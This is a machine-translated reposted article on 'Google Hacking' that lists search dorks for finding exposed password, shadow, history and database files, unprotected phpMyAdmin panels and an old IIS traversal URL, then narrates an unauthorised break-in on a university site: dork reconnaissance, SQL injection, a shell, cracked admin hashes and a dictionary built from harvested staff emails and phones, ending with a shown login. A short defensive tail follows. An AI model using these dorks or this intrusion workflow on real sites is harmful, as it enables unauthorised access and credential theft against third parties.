This article is obtained from an online reseller!
------------------------------------
Google Hacking is actually nothing new. I saw some related introductions on some foreign sites in the early years. However, since Google Hacking did not pay attention to this technology at the time, I think that at most it is only used to find unrenamed MDB or webshells left by others, and there is not much practical use. but some time ago, after carefully reading some information, I suddenly realized that Google Hacking is not so simple...
[Section 1]
Simple implementation of Google Hacking
I have seen one before.ArticleSimply search for dvbbs6.mdb or conn by using www.google.com. inc. in fact, some Google syntaxes can be used to provide us with more information (of course, they also provide more information to those who are used to attacks .), the following describes some common syntaxes.
Intext:
This is to use a character in the body of the webpage as a search condition. for example, enter "intext: Net" in Google. returns all the web pages that contain "" in the webpage body. allintext: similar to intext.
Intitle:
Similar to the intext above, search for whether the webpage title contains the characters we are looking. for example, search: intitle: Security angel. all Web pages whose titles contain "Security Angel" will be returned. similarly, allintitle: is similar to intitle.
Cache:
Search for the cache of some content in Google, and sometimes you may find some good stuff.
Define:
Search for the definition of a word. Search: Define: hacker. The definition of hacker is returned.
Filetype:
I would like to recommend that you use this tool to collect information about specific targets, whether it is a web attack or what we will talk about later. search for files of the specified type. for example, input: filetype: Doc. all file URLs ending with Doc will be returned. of course, if you are looking. bak ,. MDB or. inc is also available, and more information may be obtained :)
Info:
Query the basic information of a specified site.
Inurl:
Search whether the specified character exists in the URL. For example, if you enter inurl: Admin, N Connections similar to the following are returned: success.
Link:
For example, search: inurl: www.4ngel.net can return all URLs connected to www.4ngel.net.
Site:
This is also useful. For example, site: www.4ngel.net. will return all URLs related to this site of 4ngel.net.
some operators are also useful:
+ display columns that may be ignored by Google as query range
-ignore a word
~ Word of consent
. single wildcard
* wildcard, can represent multiple letters
"" exact query
let's start with the actual application (I personally prefer to use Google.com, and the following content is searched on Google). For an attacker who is eager to test, maybe he is most interested in the password file. google often discloses some sensitive information to them because of its powerful search capabilities. search for the following content by Google:
intitle: "index of" etc
intitle: "index ". sh_history
intitle: "index ". bash_history
intitle: "index of" passwd
intitle: "index of" people. LST
intitle: "index of" PWD. DB
intitle: "index of" etc/shadow
intitle: "index of" spwd
intitle: "index of" Master. passwd
intitle: "index of" htpasswd
"#-FrontPage-" inurl: service. PWD
sometimes some important password files are exposed to the network without protection for various reasons. If they are obtained by someone with ulterior motives, the harm is very serious. the following is a passwd file of the FreeBSD system (which I have already processed):
you can also use Google to search for Programs with vulnerabilities , for example, zeroboard found a file Code leakage vulnerability some time ago. We can use Google to find websites that use this program online:
intext: zeroboard filetype: php
or use:
inurl: outlogin. PHP? _ Zb_path = site :. JP
to find the page we need. phpMyAdmin is a set of powerful database operation software. Due to misconfiguration of some sites, we can directly operate phpMyAdmin without using a password. you can use Google to search for the program URL with the vulnerability:
intitle: phpMyAdmin intext: create new database
Remember http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe? Dir? You may also find many antique-grade machines by using Google. We can also use this to find pages with other CGI vulnerabilities.
Allinurl: winnt system32
As we have mentioned earlier, Google can be used to search for database files. Some syntaxes can be used to precisely search for more information (Access database, MSSQL, MySQL Connection Files, etc ). for example:
Allinurl: BBS data
Filetype: MDB inurl: Database
Filetype: Inc Conn
Inurl: Data filetype: MDB
Intitle: "index of" data // This often occurs on Apache + Win32 servers with incorrect configuration.
Like the above principle, we can also use Google to find the backend. The method is just a few words. After all, the purpose of this article is to let everyone know about Google Hacking, instead of letting you use Google to destroy it. security is a double-edged sword. The key lies in how you use it.
[Section 2]
Google can be used to collect and penetrate information on a site. Next we will use Google to perform a test on a specific site. Www.xxxx.com is one of the famous universities in China. I decided to perform a test on the website by chance (all the information about the school involved in this article has been processed. Do not check the number :).
First, use Google to check some basic information about the site (some details are omitted ):
Site: xxxx.com
Find the domain names of several school departments from the returned information:
Http://a1.xxxx.com
Http://a2.xxxx.com
Http://a3.xxxx.com
Http://a4.xxxx.com
Ping by the way, it should be on different servers. (think about the poor web server in our school. The University is rich and sweaty ). Schools generally have a lot of good information. Let's see if there are any good things:
Site: xxxx.com filetype: Doc
Get n good doc files. First look for the website management background address:
Site: xxxx.com intext: Management
Site: xxxx.com inurl: Login
Site: xxxx.com intitle: Management
More than 2 Admin backend addresses:
Http://a2.xxxx.com/sys/admin_login.asp
Http://a3.xxxx.com: 88/_ admin/login_in.asp
Pretty good. Let's see what programs are running on the server:
Site: a2.xxxx.com filetype: ASP
Site: a2.xxxx.com filetype: PHP
Site: a2.xxxx.com filetype: aspx
Site: a3.xxxx.com filetype: ASP
Site :.......
......
On the A2 server, IIS is used, ASP is used, and a PHP Forum is also used.
The A3 server is also IIS, aspx + ASP. Web programs should all be developed by themselves. If you have a forum, you can see if you can meet any public FTP account or something:
Site: a2.xxxx.com intext: ftp ://*:*
No value found. Let's see if there are any upload vulnerabilities:
Site: a2.xxxx.com inurl: File
Site: a3.xxxx.com inurl: Load
A file upload page is found on A2:
Http://a2.xxxx.com/sys/uploadfile.asp
I checked it with IE and did not have the access permission. Try injection,
Site: a2.xxxx.com filetype: ASP
Get the address of n asp pages, and let the software do the physical work. This program obviously does not prevent injection, and the dbowner permission is not high, but it is sufficient, back a shell I don't like very much, and it seems that the database is not small, and the web administrator's password is exposed directly. Then, MD5 encryption is passed. Generally, the passwords of school sites are relatively regular, and they are usually domain name + phone deformation. Use Google to fix it.
Site: xxxx.com // obtain N second-level domain names
Site: xxxx.com intext: * @ xxxx.com // get n email addresses and the name of the email owner.
Site: xxxx.com intext: Phone Number // n
Create a dictionary of the information and then run it slowly. After a while, I ran out of four accounts, two of which were from the student union, one administrator, and one possibly from the teacher's account. Login:
Name: website administrator
Pass: a2xxxx7619 // Let's talk about it, that is, the domain name + 4 digits
How to escalate the permission is not discussed in this article.
Prevention of Google Hacking:
Refer to the previous article: http://www.4ngel.net/article/26.htm.
However, I personally do not recommend this method. It is a bit of Silver-free three hundred. In a simple way, Google deletes some information on its website and accesses this URL:
Http://www.google.com/remove.html
A few days ago I saw someone discussing how to use a program to cheat the robot. I think I can try it:
The Code is as follows:
<? PHP
If (strstr ($ _ server ['HTTP _ user_agent '], "googlebot "))
{
Header ("HTTP/1.1 301 ");
Header ("Location: http://www.google.com ");
}
?>
ASP:
<%
If instr (request. servervariables ("http_user_agent"), "googlebot") then
Response. Redirect ("http://www.google.com ")
End if
%>
postscript
during this period, some Google hack research sites outside China looked at it. In fact, it is almost the flexible use of some basic syntaxes, or the combination of a script vulnerability mainly depends on the flexibility of the individual. There are not many defense measures for Google hack in foreign countries, so we are still waiting till now, so don't try to crack it. For some Apache network administrators running on Windows
pay more attention to this aspect. An intitle: Index of will almost all come out :)